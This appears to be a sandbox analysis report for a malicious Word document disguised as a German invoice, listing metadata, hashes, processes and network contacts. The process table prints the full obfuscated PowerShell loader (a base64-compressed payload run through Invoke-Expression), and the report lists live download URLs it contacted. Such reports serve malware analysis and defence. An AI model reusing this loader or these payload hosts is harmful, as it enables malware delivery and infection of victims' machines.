File name: | Rechnung-FCU91494556.doc |
Full analysis: | https://app.any.run/tasks/03c3453a-3488-4adb-82cb-10c424c2ce77 |
Verdict: | Malicious activity |
Analysis date: | March 14, 2019, 17:42:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Ikirod-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 11 12:07:00 2018, Last Saved Time/Date: Wed Jul 11 12:07:00 2018, Number of Pages: 1, Number of Words: 0, Number of Characters: 1, Security: 0, Title: 11260Ik71295, Subject: 74965Ik9537 |
MD5: | F212304055F1BC6F52AF93D112471483 |
SHA1: | 117AC1CBB36AC971F1EF9F2E1953B61B8A190F91 |
SHA256: | E571E2DDE219F648861718EEAE29F73707447FD4B7EF8C8D1DBE0A82C458DCEA |
SSDEEP: | 6144:jFVeEsjdXRC3jexGG6fYWofNCHds/+Nk9H05wOmyvXR5:jFVeEwdXET0i8NCHds/+C058yvXb |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Category: | 14680Ik92832 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 1 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | 31757Ik8724 |
CodePage: | Windows Latin 1 (Western European) |
Subject: | 74965Ik9537 |
Title: | 11260Ik71295 |
Security: | None |
Characters: | 1 |
Words: | - |
Pages: | 1 |
ModifyDate: | 2018:07:11 11:07:00 |
CreateDate: | 2018:07:11 11:07:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Author: | Ikirod-PC |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2744 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Rechnung-FCU91494556.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3864 | powershell (NEw-OBjEct SySTEm.IO.comPreSSioN.DEFLaTeStrEaM( [SystEM.iO.MEmoryStReam] [COnvErT]::fROmBASe64STRINg( 'VZBda8IwFIb/Si8CUZwJ+0CYoSBz7AO26SYoG7tJ4plNlyY1PTOzxf8+26t5cy7e9+GB95CPpzp1EIde5aAxeQFkK1BTa8ChIO8P85RmiOWY8xgjk5tcVsyHDS/45H9u0TgVvKuZ9gXDwG+m1cyfMFAoqaVtAT4fyYvzx+eTHoPcgf1B4x0za65VeZ9drk6Qwitju7OXRSdavuZ2uV0ip2xRWoM9OqF9QWaLmKQJHV1fUUHe6pgScLsxQlEO6CcdtP2AMvgFKr58AKmzHtnGPDEuaTf3Gwz7hhx/w259dNbL9Z2x0DFnSSvsiwXKgMN58BqqqsuEOpq+xUFL1FlzOPwB' ), [iO.compRESsIon.COMPResSIONmoDe]::DeComPRESS) | FoREaCh-oBJecT{NEw-OBjEct IO.sTReaMReAder($_ , [texT.Encoding]::asCii )} ).reaDtoEND( ) |InVoke-EXPreSsion | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
2744 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRC50B.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NGWS405BYI0ABMFLKGWX.temp | — | |
MD5:— | SHA256:— | |||
3864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2744 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F9A0F18EACC74B893F429636D21B21D3 | SHA256:056B2143329E6BFAF0ECE21ECFCC0A9F53D0463E3837E8848A3217CF08522688 | |||
3864 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19d1ae.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
3864 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\74FBF93595CFC8459196065CE54AD928 | binary | |
MD5:F48C7E3B9311307842B241905B5AC844 | SHA256:5802D18A92A738AC1BE84AF89043671956CC214002D2316960DF4EC2BCBCE6B6 | |||
2744 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$chnung-FCU91494556.doc | pgc | |
MD5:B5C7E45D9FC932B05ECCB608949406A2 | SHA256:F07074E915AC39DA808B82ACF70D7B05F81C03FB59E7DC223B6E3F6DB3CA4799 | |||
3864 | powershell.exe | C:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\74FBF93595CFC8459196065CE54AD928 | der | |
MD5:1EDAF9AE99CE2920667D0E9A8B3F8C9C | SHA256:4F32D5DC00F715250ABCC486511E37F501A899DEB3BF7EA8ADBBD3AEF1C412DA |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3864 | powershell.exe | GET | 301 | 82.223.15.184:80 | http://www.embacal.com/P6a21IM/ | ES | — | — | suspicious |
3864 | powershell.exe | GET | — | 159.89.197.57:80 | http://www.agjas.org/m/ | US | — | — | suspicious |
3864 | powershell.exe | GET | — | 159.89.197.57:80 | http://www.agjas.org/m/ | US | — | — | suspicious |
3864 | powershell.exe | GET | 404 | 82.223.15.184:80 | http://embacal.com/P6a21IM/ | ES | html | 19.4 Kb | suspicious |
3864 | powershell.exe | GET | 200 | 91.199.212.52:80 | http://crt.comodoca.com/COMODORSAAddTrustCA.crt | GB | der | 1.37 Kb | whitelisted |
3864 | powershell.exe | GET | 301 | 176.31.100.201:80 | http://www.altinbronz.com.tr/BCsOo/ | FR | html | 331 b | malicious |
3864 | powershell.exe | GET | 404 | 185.171.90.34:80 | http://www.mobilmobilyam.com/VQjlVqVt/ | TR | html | 29.1 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3864 | powershell.exe | 176.31.100.201:443 | www.altinbronz.com.tr | OVH SAS | FR | suspicious |
3864 | powershell.exe | 176.31.100.201:80 | www.altinbronz.com.tr | OVH SAS | FR | suspicious |
3864 | powershell.exe | 159.89.197.57:80 | www.agjas.org | — | US | suspicious |
3864 | powershell.exe | 82.223.15.184:80 | www.embacal.com | 1&1 Internet SE | ES | suspicious |
3864 | powershell.exe | 185.171.90.34:80 | www.mobilmobilyam.com | Dgn Teknoloji A.s. | TR | suspicious |
3864 | powershell.exe | 91.199.212.52:80 | crt.comodoca.com | Comodo CA Ltd | GB | suspicious |
Domain | IP | Reputation |
---|---|---|
www.agjas.org |
| unknown |
www.altinbronz.com.tr |
| malicious |
crt.comodoca.com |
| whitelisted |
www.embacal.com |
| suspicious |
embacal.com |
| suspicious |
www.travelution.id |
| suspicious |
www.mobilmobilyam.com |
| suspicious |